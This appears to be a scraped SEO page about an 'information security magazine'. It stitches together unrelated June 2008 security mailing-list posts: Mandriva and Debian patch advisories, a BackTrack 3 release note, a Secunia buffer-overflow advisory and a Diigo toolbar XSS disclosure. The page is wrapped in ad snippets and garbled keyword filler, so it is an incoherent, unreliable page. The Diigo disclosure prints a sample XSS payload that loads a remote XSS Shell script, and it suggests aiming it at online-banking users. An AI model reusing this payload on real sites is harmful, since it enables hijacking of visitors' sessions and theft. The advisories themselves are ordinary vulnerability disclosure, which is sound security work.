information security magazine
Snoop alert: Beware of the guy with IT on his nametag
Everyone hates an office snoop, and for the best of reasons. But the real worry is not the person in the next cubicle but the nerd down the hall with a nametag that says internet technology somewhere on it. These are the real snoops, as it turns out ...
Order Magazines Online
Browse Wide Selection Of Magazines & Read It Online.
www.WYP.net
Order Newspapers Online
Extensive List of Newspapers To Pick. Order & Read Today.
www.AreaConnect.com
Information Security Magazine
Looking for Information Security Magazine?
www.Shopica.org
From: security@mandriva.com
Date: Fri, 20 Jun 2008 22:23:00 +0100
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
_______________________________________________________________________
Mandriva Linux Security Advisory MDVSA-2008:118
http://www.mandriva.com/security/
_______________________________________________________________________
Package : net-snmp
Date : June 19, 2008
Affected: 2007.1, 2008.0, 2008.1, Corporate 3.0, Corporate 4.0,
Multi Network Firewall 2.0
_______________________________________________________________________
Problem Description:
A vulnerability was found in how Net-SNMP checked an SNMPv3 packet's
Keyed-Hash Message Authentication Code (HMAC). An attacker
could exploit this flaw to spoof an authenticated SNMPv3 packet
(CVE-2008-0960).
A buffer overflow was found in the perl bindings for Net-SNMP that
could be exploited if an attacker could convince an application
using the Net-SNMP perl modules to connect to a malicious SNMP agent
(CVE-2008-2292).
The updated packages have been patched to prevent these issues.
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0960
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2292
_______________________________________________________________________
Updated Packages:
Mandriva Linux 2007.1:
8db66ef5a5468d3fd72a47855230a28e 2007.1/i586/libnet-snmp10-5.3.1-3.2mdv2007.1.i586.rpm
c951b17138ef11828b2ccf031d4cddaf 2007.1/i586/libnet-snmp10-devel-5.3.1-3.2mdv2007.1.i586.rpm
536a87919f32fac81964d0a907bf08fe 2007.1/i586/libnet-snmp10-static-devel-5.3.1-3.2mdv2007.1.i586.rpm
39e33947c21666dac5dbe5cfe103b26d 2007.1/i586/net-snmp-5.3.1-3.2mdv2007.1.i586.rpm
1eed5ebaff8f6f83befbf8d831900073 2007.1/i586/net-snmp-mibs-5.3.1-3.2mdv2007.1.i586.rpm
874db03c69584025e4d91049072d3c4e 2007.1/i586/net-snmp-trapd-5.3.1-3.2mdv2007.1.i586.rpm
11af93c879d8cd9353b7cb1826900222 2007.1/i586/net-snmp-utils-5.3.1-3.2mdv2007.1.i586.rpm
2c9e819eeb5fd472f6a0fe338d86182b 2007.1/i586/perl-NetSNMP-5.3.1-3.2mdv2007.1.i586.rpm
7a0806202ff8f3d838fa7958b636a449 2007.1/SRPMS/net-snmp-5.3.1-3.2mdv2007.1.src.rpm
Mandriva Linux 2007.1/X86_64:
aa27de502ce22110fd745c0b847b79d9 2007.1/x86_64/lib64net-snmp10-5.3.1-3.2mdv2007.1.x86_64.rpm
1843dd154c443cca9ae977e502221d6d 2007.1/x86_64/lib64net-snmp10-devel-5.3.1-3.2mdv2007.1.x86_64.rpm
838bd7820d446bd947bc46e090b38066 2007.1/x86_64/lib64net-snmp10-static-devel-5.3.1-3.2mdv2007.1.x86_64.rpm
e659d3df04816330c7bf45008f66bc27 2007.1/x86_64/net-snmp-5.3.1-3.2mdv2007.1.x86_64.rpm
756d5606a1039d20a7512b0a109d53bb 2007.1/x86_64/net-snmp-mibs-5.3.1-3.2mdv2007.1.x86_64.rpm
8ad36943e07362865f3a48c99914e48c 2007.1/x86_64/net-snmp-trapd-5.3.1-3.2mdv2007.1.x86_64.rpm
483140c06017507127d12357c3ed2b41 2007.1/x86_64/net-snmp-utils-5.3.1-3.2mdv2007.1.x86_64.rpm
e2bb901815ffa1ca5b0a16bc1363f84f 2007.1/x86_64/perl-NetSNMP-5.3.1-3.2mdv2007.1.x86_64.rpm
7a0806202ff8f3d838fa7958b636a449 2007.1/SRPMS/net-snmp-5.3.1-3.2mdv2007.1.src.rpm
Mandriva Linux 2008.0:
8de3c4975620db2b2c2697d6f9deb79b 2008.0/i586/libnet-snmp15-5.4.1-1.1mdv2008.0.i586.rpm
b1991c58d996f4be200fe141e28c5f7d 2008.0/i586/libnet-snmp-devel-5.4.1-1.1mdv2008.0.i586.rpm
03c54182cc7f97633f29ff0251a8c898 2008.0/i586/libnet-snmp-static-devel-5.4.1-1.1mdv2008.0.i586.rpm
1f792de19b7b38b56d68242958d5d800 2008.0/i586/net-snmp-5.4.1-1.1mdv2008.0.i586.rpm
e3362a641e232a6ecf0b8230f0e49ec8 2008.0/i586/net-snmp-mibs-5.4.1-1.1mdv2008.0.i586.rpm
bc6d8c10135ea64a4d512d80d04b1b39 2008.0/i586/net-snmp-trapd-5.4.1-1.1mdv2008.0.i586.rpm
8e7f28ee85fb48129eea57d11d391c8b 2008.0/i586/net-snmp-utils-5.4.1-1.1mdv2008.0.i586.rpm
beab129e378f61a6bf62d366a4d90639 2008.0/i586/perl-NetSNMP-5.4.1-1.1mdv2008.0.i586.rpm
3fce488df784163f19e6a55061d773ca 2008.0/SRPMS/net-snmp-5.4.1-1.1mdv2008.0.src.rpm
Mandriva Linux 2008.0/X86_64:
82b570c9cb7e0662df4d7da730c131db 2008.0/x86_64/lib64net-snmp15-5.4.1-1.1mdv2008.0.x86_64.rpm
20b8a6e3fc8dd82fe5ecfdb337553938 2008.0/x86_64/lib64net-snmp-devel-5.4.1-1.1mdv2008.0.x86_64.rpm
555688caa0eee850b3a5f835a5778849 2008.0/x86_64/lib64net-snmp-static-devel-5.4.1-1.1mdv2008.0.x86_64.rpm
60d65f80aec29dcb6d4ceb4bb117a9bc 2008.0/x86_64/net-snmp-5.4.1-1.1mdv2008.0.x86_64.rpm
685c9dd25b585afc128de1b3c092e5d5 2008.0/x86_64/net-snmp-mibs-5.4.1-1.1mdv2008.0.x86_64.rpm
7bff860904572c092f737ac17940d5b2 2008.0/x86_64/net-snmp-trapd-5.4.1-1.1mdv2008.0.x86_64.rpm
e434686bddfb04f2a8bd01346517ecb4 2008.0/x86_64/net-snmp-utils-5.4.1-1.1mdv2008.0.x86_64.rpm
4fab6e498e1f05809db500ce895aad66 2008.0/x86_64/perl-NetSNMP-5.4.1-1.1mdv2008.0.x86_64.rpm
3fce488df784163f19e6a55061d773ca 2008.0/SRPMS/net-snmp-5.4.1-1.1mdv2008.0.src.rpm
Mandriva Linux 2008.1:
4bafceae1a29f6557b5aa884eca24ba0 2008.1/i586/libnet-snmp15-5.4.1-5.1mdv2008.1.i586.rpm
1eedbae5df7e503de1cba736129beaa1 2008.1/i586/libnet-snmp-devel-5.4.1-5.1mdv2008.1.i586.rpm
615a88847cbf1ce6eaf0029037a14b1b 2008.1/i586/libnet-snmp-static-devel-5.4.1-5.1mdv2008.1.i586.rpm
7323cb7d35eb67664d40ad73b413679d 2008.1/i586/net-snmp-5.4.1-5.1mdv2008.1.i586.rpm
d43ed96a806639a94af2a137c75e276e 2008.1/i586/net-snmp-mibs-5.4.1-5.1mdv2008.1.i586.rpm
7394b1361b43056b5eb99827771358cf 2008.1/i586/net-snmp-tkmib-5.4.1-5.1mdv2008.1.i586.rpm
8d6fd9308c2edbe8c020d2c33b3a841d 2008.1/i586/net-snmp-trapd-5.4.1-5.1mdv2008.1.i586.rpm
dc58047a02e1a222af20aa794ea8f447 2008.1/i586/net-snmp-utils-5.4.1-5.1mdv2008.1.i586.rpm
2ad9888cd61fc4952c1cee0c48f714b5 2008.1/i586/perl-NetSNMP-5.4.1-5.1mdv2008.1.i586.rpm
7a19c1f8d42052af6392b18b48bd965c 2008.1/SRPMS/net-snmp-5.4.1-5.1mdv2008.1.src.rpm
Mandriva Linux 2008.1/X86_64:
618c241e0ecb57685646264c9bb083b4 2008.1/x86_64/lib64net-snmp15-5.4.1-5.1mdv2008.1.x86_64.rpm
bb0ebf49ee7cca29965aeb398f4725f6 2008.1/x86_64/lib64net-snmp-devel-5.4.1-5.1mdv2008.1.x86_64.rpm
b4f29f00773291f6cc00784ed7cde470 2008.1/x86_64/lib64net-snmp-static-devel-5.4.1-5.1mdv2008.1.x86_64.rpm
3039811b6682dc4009b32ff48a99eb2b 2008.1/x86_64/net-snmp-5.4.1-5.1mdv2008.1.x86_64.rpm
fab09178635501eb5d6a82eb7bd532a3 2008.1/x86_64/net-snmp-mibs-5.4.1-5.1mdv2008.1.x86_64.rpm
da29d4c7edaa15d95f8bee98dbfab025 2008.1/x86_64/net-snmp-tkmib-5.4.1-5.1mdv2008.1.x86_64.rpm
d9aad834d82d310c64f6f21e17a55920 2008.1/x86_64/net-snmp-trapd-5.4.1-5.1mdv2008.1.x86_64.rpm
7a7c871bd87dc91c16b046ac115cda70 2008.1/x86_64/net-snmp-utils-5.4.1-5.1mdv2008.1.x86_64.rpm
d102ea2af0fcaaebd98defda72bcfc91 2008.1/x86_64/perl-NetSNMP-5.4.1-5.1mdv2008.1.x86_64.rpm
7a19c1f8d42052af6392b18b48bd965c 2008.1/SRPMS/net-snmp-5.4.1-5.1mdv2008.1.src.rpm
Corporate 3.0:
335af3930865c8eb44ef436cad5fb373 corporate/3.0/i586/libnet-snmp5-5.1-7.4.C30mdk.i586.rpm
b8e1d307ee6fa3905d292077fc063318 corporate/3.0/i586/libnet-snmp5-devel-5.1-7.4.C30mdk.i586.rpm
a668cc4de411865567d1a93f34cee1e3 corporate/3.0/i586/libnet-snmp5-static-devel-5.1-7.4.C30mdk.i586.rpm
d8c0d342b03e5719443d2de06c631bd5 corporate/3.0/i586/libsnmp0-4.2.3-8.2.C30mdk.i586.rpm
6bbe3bb2502ce3c974f7b5737331bb4d corporate/3.0/i586/libsnmp0-devel-4.2.3-8.2.C30mdk.i586.rpm
daca10f2e578f75c1e7415d78ed30265 corporate/3.0/i586/net-snmp-5.1-7.4.C30mdk.i586.rpm
1630ebd75201e1bc3956b12a26282f92 corporate/3.0/i586/net-snmp-mibs-5.1-7.4.C30mdk.i586.rpm
5a4f483c877a6278088a265cb3273d61 corporate/3.0/i586/net-snmp-trapd-5.1-7.4.C30mdk.i586.rpm
316d866de7fa7cd984d58f5cb742f5e3 corporate/3.0/i586/net-snmp-utils-5.1-7.4.C30mdk.i586.rpm
e3d4197517565f12e2c3a8fd1cc5d2e7 corporate/3.0/i586/ucd-snmp-4.2.3-8.2.C30mdk.i586.rpm
17e8d856fd1dac18552818a842105c88 corporate/3.0/i586/ucd-snmp-utils-4.2.3-8.2.C30mdk.i586.rpm
ccaa4d311ad0e5d119e17b1f1876c7e2 corporate/3.0/SRPMS/net-snmp-5.1-7.4.C30mdk.src.rpm
53e16d2069cffb7e7d1e7a324192d5c2 corporate/3.0/SRPMS/ucd-snmp-4.2.3-8.2.C30mdk.src.rpm
Corporate 3.0/X86_64:
b31f277942fca76d953007c94a60cae2 corporate/3.0/x86_64/lib64net-snmp5-5.1-7.4.C30mdk.x86_64.rpm
e4a3fba10ccdd805dc8783ae68c99a42 corporate/3.0/x86_64/lib64net-snmp5-devel-5.1-7.4.C30mdk.x86_64.rpm
530a94cc87af0e4d6e9f3815473c0dd4 corporate/3.0/x86_64/lib64net-snmp5-static-devel-5.1-7.4.C30mdk.x86_64.rpm
f246ca421b5d16c599d53f70e4b97660 corporate/3.0/x86_64/lib64snmp0-4.2.3-8.2.C30mdk.x86_64.rpm
b943e07726a2fecb016ef4ba626906d8 corporate/3.0/x86_64/lib64snmp0-devel-4.2.3-8.2.C30mdk.x86_64.rpm
22822876f72e35cf6d1ed027df93e74a corporate/3.0/x86_64/net-snmp-5.1-7.4.C30mdk.x86_64.rpm
e7e51782b9bbd1e1bdf93c17fb953280 corporate/3.0/x86_64/net-snmp-mibs-5.1-7.4.C30mdk.x86_64.rpm
e67a9105f9492c020693d48ce55652ea corporate/3.0/x86_64/net-snmp-trapd-5.1-7.4.C30mdk.x86_64.rpm
171a17e507b2dfdb9c70c0089e582221 corporate/3.0/x86_64/net-snmp-utils-5.1-7.4.C30mdk.x86_64.rpm
96886146d21175b076e92d59e96f5016 corporate/3.0/x86_64/ucd-snmp-4.2.3-8.2.C30mdk.x86_64.rpm
1b6ee4c253f15be516a1928a4f791f15 corporate/3.0/x86_64/ucd-snmp-utils-4.2.3-8.2.C30mdk.x86_64.rpm
ccaa4d311ad0e5d119e17b1f1876c7e2 corporate/3.0/SRPMS/net-snmp-5.1-7.4.C30mdk.src.rpm
53e16d2069cffb7e7d1e7a324192d5c2 corporate/3.0/SRPMS/ucd-snmp-4.2.3-8.2.C30mdk.src.rpm
Corporate 4.0:
6cbe9d76db3b05c2435bcbc5cf16c898 corporate/4.0/i586/libnet-snmp5-5.2.1.2-5.2.20060mlcs4.i586.rpm
586a55cfde45020d5ea0ebf5f2d6c840 corporate/4.0/i586/libnet-snmp5-devel-5.2.1.2-5.2.20060mlcs4.i586.rpm
d992d8300cf0639942a179349d592e15 corporate/4.0/i586/libnet-snmp5-static-devel-5.2.1.2-5.2.20060mlcs4.i586.rpm
03a49b848c376b705dcfcef0ec817daf corporate/4.0/i586/net-snmp-5.2.1.2-5.2.20060mlcs4.i586.rpm
22b9d01b3b7a8a34ed3e1a5a435286a8 corporate/4.0/i586/net-snmp-mibs-5.2.1.2-5.2.20060mlcs4.i586.rpm
dccc01a94c1f29eac2875e6a935bf589 corporate/4.0/i586/net-snmp-trapd-5.2.1.2-5.2.20060mlcs4.i586.rpm
77f93230f96abce039b52ca5612eaa36 corporate/4.0/i586/net-snmp-utils-5.2.1.2-5.2.20060mlcs4.i586.rpm
8a7209b70979c9d73035ff40cbd8dbb4 corporate/4.0/i586/perl-NetSNMP-5.2.1.2-5.2.20060mlcs4.i586.rpm
ac919459a8752cddfd441c085ca69117 corporate/4.0/SRPMS/net-snmp-5.2.1.2-5.2.20060mlcs4.src.rpm
Corporate 4.0/X86_64:
f94c7e967973ba8aa12b5605251d6e78 corporate/4.0/x86_64/lib64net-snmp5-5.2.1.2-5.2.20060mlcs4.x86_64.rpm
f332985986eff2d6c8a75b5c263dedb1 corporate/4.0/x86_64/lib64net-snmp5-devel-5.2.1.2-5.2.20060mlcs4.x86_64.rpm
82fc454916e75866370ee738292021c8 corporate/4.0/x86_64/lib64net-snmp5-static-devel-5.2.1.2-5.2.20060mlcs4.x86_64.rpm
ff0adeb23df57eb34869c7100df159da corporate/4.0/x86_64/net-snmp-5.2.1.2-5.2.20060mlcs4.x86_64.rpm
72f2dc9cb1695999660a9ff9c97e4c47 corporate/4.0/x86_64/net-snmp-mibs-5.2.1.2-5.2.20060mlcs4.x86_64.rpm
0f244551c87e051a8274e5050cf0bc2a corporate/4.0/x86_64/net-snmp-trapd-5.2.1.2-5.2.20060mlcs4.x86_64.rpm
7c4e7fb304c77c6551a50495d338e84e corporate/4.0/x86_64/net-snmp-utils-5.2.1.2-5.2.20060mlcs4.x86_64.rpm
68d81ca4c173710ef43b36092df2a6ee corporate/4.0/x86_64/perl-NetSNMP-5.2.1.2-5.2.20060mlcs4.x86_64.rpm
ac919459a8752cddfd441c085ca69117 corporate/4.0/SRPMS/net-snmp-5.2.1.2-5.2.20060mlcs4.src.rpm
Multi Network Firewall 2.0:
f98286a301d580fe306917cf0169ef88 mnf/2.0/i586/libnet-snmp5-5.1-7.4.M20mdk.i586.rpm
3ba27516773b1dd933828207cecc7754 mnf/2.0/SRPMS/net-snmp-5.1-7.4.M20mdk.src.rpm
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iD8DBQFIW/O7mqjQ0CJFipgRAlNDAJwKuG+ljPAS2MDqj4QOlf+2PtWFUQCeIlun
Kcp+qeLAEA/HEE8HXT88NkY=
=D9Hu
-----END PGP SIGNATURE-----
From: Ferruh MavitunaDate: Fri, 20 Jun 2008 20:53:29 +0100
Diigo Toolbar - Global XSS and Information Leakage in SSL URLs == Global XSS == Diigo is (http://www.diigo.com/) a social bookmarking and sharing application which allows users to see other users comments and notes for every website. For this feature users should use Diigolet bookmarklet or Diigo Toolbar - http://www.diigo.com/tools. These are almost mandatory to use Diigo and almost all Diigo members have them installed. An attacker can do Cross-site Scripting in these public comments and that comment will affect any other user of Diigo Toolbar and Diigolet who visits the website. This means a Diigo user can backdoor any website in the internet easily with a permanent XSS and any other Diigo user who visits this website will be affected. Vulnerability exists in: * Diigo Toolbar for IE, * Diigo Toolbar for FF, * Diigolet for IE and FF, These comments will be injected into the current domain context, thus an attacker can execute a Javascript code in the target domain, Target URL can be over SSL as well. All Diigo tools users are affected from this vulnerability. For an attacker this is a perfect opportunity to use some XSS bot manager application such as XSS Shell, Also an attacker can attack high profile websites such as online banking applications. Considering you can search in shared bookmarks so you can actually people who uses a certain online banking application. Sample attack comment can be: <script src="http://example.com/xssshell/"></script> == Fix == Download latest version of Diigo Toolbar == Disclosure Timeline == * 12 May 2008 - Vendor Informed * 2 June 2008 - Another e-mail to vendor to check if they've fixed * 3 June 2008 - Vendor informed me that it's fixed * 20 June 2008 - Public Release == Information Leakage in SSL URLs == Diigo toolbar is sending all SSL URLs to their servers over HTTP for shared comment feature, which might cause to leak session_ids over URL or any other sensitive information transferred over URL. == Fix == User can not opt-out from this feature. There is no known fix, this looks like considered as a feature not a bug. == Disclosure Timeline == * 9 May 2008 - Vendor Informed, Couple of mail exchanged and I tried to explain why this is bad, it didn't work. * 12 May 2008 - Ask for an update, No response. * 20 June 2008 - Public Release -- Ferruh Mavituna http://ferruh.mavituna.comFrom: Max Moser
Date: Fri, 20 Jun 2008 17:12:49 +0100
BackTrack 3 Final - Release Information
Released yesterday exclusively on pauldotcom.com
Muts, Martin and I have slaved for weeks and months, together with the
help of many remote-exploit'ers to bring you this fine release. As
usual, this version overshadows the previous ones with extra cool
things.
SAINT
SAINT has provided BackTrack users with a functional version of SAINT,
pending a free request for an IP range license through the SAINT
website, valid for 1 year.
Maltego
The guys over at Paterva have created a special version of Maltego
v2.0 with a community license especially for BackTrack users. We would
like to thank Paterva for co-operating with us and allowing us to
feature this amazing tool in BackTrack.
Nessus
Tenable would not allow for redistribution of Nessus on BackTrack 3.
Kernel
2.6.21.5. Yes, yes, stop whining....We had serious deliberations
concerning the BT3 kernel. We decided not to upgrade to a newer kernel
as wireless injection patches were not fully tested and verified. We
did not want to jeopardize the awesome wireless capabilities of BT3
for the sake of sexiness or slightly increased hardware
compatibilities. All relevant security patches have been applied.
Tools
As usual, updated, sharpened, SVN'ed and armed to the teeth. This
release we have some special features such as spoonwep, fastrack and
other cool additions.
Availability
For the first time we distribute three different version of Backtrack 3
- CD version
- USB version
- VMWare version
BackTrack 3 final download page is here:
http://remote-exploit.org/backtrack_download.html
Final Requests
We request the community to not mirror or torrent this release, or
otherwise distribute it online without our knowledge.
We are trying to gather statistics about bt3 downloads. If you would
like to mirror BT3 then please:
1) Think again! Traffic generated by BT3 downloads is CRAZY.
2) Please contact us before doing so.
3) Send us monthly statistics of downloads for the iso.
If you would like to add a link to BackTrack downloads to your
website, please use:
http://www.remote-exploit.org/backtrack_download.html as the download link.
Rants
Problems, fixes, bugs, opinions - should all end up in our Remote
Exploit community forums, and our wiki:
http://forums.remote-exploit.org
http://wiki.remote-exploit.org
Over and out,
Max, Muts, MjM
From: thijs@debian.org (Thijs Kinkhorst)Date: Thu, 19 Jun 2008 22:12:53 +0100
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- ------------------------------------------------------------------------
Debian Security Advisory DSA-1598-1 security@debian.org
http://www.debian.org/security/ Thijs Kinkhorst
June 19, 2008 http://www.debian.org/security/faq
- ------------------------------------------------------------------------
Package : libtk-img
Vulnerability : buffer overflow
Problem type : local (remote)
Debian-specific: no
CVE Id(s) : CVE-2008-0553
It was discovered that a buffer overflow in the GIF image parsing code
of Tk, a cross-platform graphical toolkit, could lead to denial of
service and potentially the execution of arbitrary code.
For the stable distribution (etch), this problem has been fixed in version
1:1.3-15etch2.
For the unstable distribution (sid), this problem has been fixed in
version 1:1.3-release-7.
We recommend that you upgrade your libtk-img package.
Upgrade instructions
- --------------------
wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.
If you are using the apt-get package manager, use the line for
sources.list as given below:
apt-get update
will update the internal database
apt-get upgrade
will install corrected packages
You may use an automated update by adding the resources from the
footer to the proper configuration.
Debian GNU/Linux 4.0 alias etch
- -------------------------------
Source archives:
http://security.debian.org/pool/updates/main/libt/libtk-img/libtk-img_1.3-15etch2.dsc
Size/MD5 checksum: 955 899003c10c63f4045b6df8ef32d3fafe
http://security.debian.org/pool/updates/main/libt/libtk-img/libtk-img_1.3.orig.tar.gz
Size/MD5 checksum: 3918119 ee19a7fdaaa64e9d85eeecd3b78bce8f
http://security.debian.org/pool/updates/main/libt/libtk-img/libtk-img_1.3-15etch2.diff.gz
Size/MD5 checksum: 242795 deb7118d93d3657201e4892c0e62e1d2
amd64 architecture (AMD x86_64 (AMD64))
http://security.debian.org/pool/updates/main/libt/libtk-img/libtk-img_1.3-15etch2_amd64.deb
Size/MD5 checksum: 461706 7394a577a99522bdabcf6016dcc05de7
arm architecture (ARM)
http://security.debian.org/pool/updates/main/libt/libtk-img/libtk-img_1.3-15etch2_arm.deb
Size/MD5 checksum: 435110 96a6c430a51de8914023256029ebac06
hppa architecture (HP PA RISC)
http://security.debian.org/pool/updates/main/libt/libtk-img/libtk-img_1.3-15etch2_hppa.deb
Size/MD5 checksum: 488468 78173de530e68252090369658db6dab7
i386 architecture (Intel ia32)
http://security.debian.org/pool/updates/main/libt/libtk-img/libtk-img_1.3-15etch2_i386.deb
Size/MD5 checksum: 431784 902eaac4fba63bccf7be864ff1242aa0
ia64 architecture (Intel ia64)
http://security.debian.org/pool/updates/main/libt/libtk-img/libtk-img_1.3-15etch2_ia64.deb
Size/MD5 checksum: 601570 4c004fd7d945b8f3e4591b5bf27ce0a8
mips architecture (MIPS (Big Endian))
http://security.debian.org/pool/updates/main/libt/libtk-img/libtk-img_1.3-15etch2_mips.deb
Size/MD5 checksum: 445292 33639ca7ed46125b98e503c2b82e34e8
mipsel architecture (MIPS (Little Endian))
http://security.debian.org/pool/updates/main/libt/libtk-img/libtk-img_1.3-15etch2_mipsel.deb
Size/MD5 checksum: 440938 20d279c06711eb509f42d48ac697ba9f
powerpc architecture (PowerPC)
http://security.debian.org/pool/updates/main/libt/libtk-img/libtk-img_1.3-15etch2_powerpc.deb
Size/MD5 checksum: 452162 8e87166cc45ccbf4c0a38ee36993f472
s390 architecture (IBM S/390)
http://security.debian.org/pool/updates/main/libt/libtk-img/libtk-img_1.3-15etch2_s390.deb
Size/MD5 checksum: 457402 2857259815207722d226c8fd90e78923
sparc architecture (Sun SPARC/UltraSPARC)
http://security.debian.org/pool/updates/main/libt/libtk-img/libtk-img_1.3-15etch2_sparc.deb
Size/MD5 checksum: 421954 686340dad232ce09f661569e37387b4d
These files will probably be moved into the stable distribution on
its next update.
- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
iQEVAwUBSFrLW2z0hbPcukPfAQIdCQgAhccZto0Df/VeVPJVKbs1n7J8oaYG88A8
JSo+6CpBhrjwRjlb0fr5qQMjHRQqxkGGECvXlb52WLMMfGz7VRqNJG/OnbS1wAgn
f7NH/QSF3hlCAV7TJXPgU1yVihRP8BIfuonHphqtcWlDXLQ+SwqZuSlQ9KE/MzcT
7gK9etNG6H2jAGPTo1M4pcp75ZfWQVR1COEzGHXp9ozIr3lDmRebE94c+49zgXGM
2CWCfUqQG5BPCp2XoKbv1hOf9uji5dxF5Qcc0vuc8J7DexSUwrnJhX6KEXHIUjPU
la5y7kPPAA3TiB732x8HYGxbhgGOcSSziZhVHEhTldNTsz+Qj6v1Aw==
=vF5L
-----END PGP SIGNATURE-----
From: Secunia ResearchDate: Fri, 20 Jun 2008 13:53:10 +0100
======================================================================
Secunia Research 20/06/2008
- XnView, NConvert, and GFL SDK Sun TAAC Buffer Overflow -
======================================================================
Table of Contents
Affected Software....................................................1
Severity.............................................................2
Vendor's Description of Software.....................................3
Description of Vulnerability.........................................4
Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10
======================================================================
1) Affected Software
* XnView 1.93.6 for Windows
* XnView 1.70 for Linux and FreeBSD
* NConvert 4.92
* GFL SDK 2.82
NOTE: Other versions may also be affected.
======================================================================
2) Severity
Rating: Highly critical
Impact: System access
Where: From remote
======================================================================
3) Vendor's Description of Software
XnView:
"A software to view and convert graphic files, really simple to use!"
Product Link:
http://pagesperso-orange.fr/pierre.g/xnview/enhome.html
NConvert:
"Come to discover NConvert, a batch utility to convert graphic files!"
Product Link:
http://pagesperso-orange.fr/pierre.g/xnview/en_nconvert.html
GFL SDK:
"GFL SDK is a free library (used by XnView) for developers who would
like to support graphics image formats easily."
Product Link:
http://pagesperso-orange.fr/pierre.g/xnview/engfl.html
======================================================================
4) Description of Vulnerability
Secunia Research has discovered a vulnerability in XnView, NConvert,
and GFL SDK, which can be exploited by malicious people to compromise
a user's system.
The vulnerability is caused due to a boundary error when processing
the "format" keyword of Sun TAAC files. This can be exploited to
cause a stack-based buffer overflow by e.g. tricking a user into
viewing a specially crafted Sun TAAC file.
Successful exploitation allows execution of arbitrary code.
The vulnerability is confirmed in version 1.70 of XnView for Linux
and FreeBSD, XnView 1.93.6 for Windows, GFL SDK 2.82, and NConvert
4.92. Other versions may also be affected.
======================================================================
5) Solution
XnView:
The vulnerability is fixed in version 1.94 beta1.
NConvert and GFL SDK:
A fixed version is not currently available. Do not open untrusted Sun
TAAC files.
======================================================================
6) Time Table
28/05/2008 - Vendor notified.
29/05/2008 - Vendor response.
18/06/2008 - Vendor issues XnView 1.94 beta1.
20/06/2008 - Public disclosure.
======================================================================
7) Credits
Discovered by Stefan Cornelius, Secunia Research.
======================================================================
8) References
The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2008-2427 for the vulnerability.
======================================================================
9) About Secunia
Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:
http://corporate.secunia.com/
Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private
individuals, who are interested in or concerned about IT-security.
http://secunia.com/
Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the
security and reliability of software in general:
http://corporate.secunia.com/secunia_research/33/
Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:
http://secunia.com/secunia_vacancies/
Secunia offers a FREE mailing list called Secunia Security Advisories:
http://secunia.com/secunia_security_advisories/
======================================================================
10) Verification
Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2008-24/
Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/
======================================================================Find the latest on Internet Security, Access Control Management, Magazine. SearchSecurity.com. SearchFinancialSecurity.com Creates sources of for technology professionals.Trade magazine dedicated to covering the world of security, data protection and disaster recovery.Shop for Information Security at Shop.com. $74.95 - books & magazines, category:books, fiction/non-fiction:non-fiction, language:english, of publications, such as magazines. So, what good, mediocre and, mmmm, "other" print periodicals "Information Security Magazine" - still a Find the latest news from SC Magazine UK, SC online for products reviews, group test, latest Manager - Incidents Magazine (May 2008) : 7 Questions to Ask Your SaaS Security is a part of the. TechTarget Still necessary for Internet security, firewalls continue to change—to add new Sharing information and communications has always been a requirement as well. Free directly from Magazine. Find out more sponsored by Magazine. TEL: 972 458 5400.
FAX: 972 458 5454 Technical CDs. Contact Us. MAGAZINES: it's debut in 1997, Information has consistently remained the . .
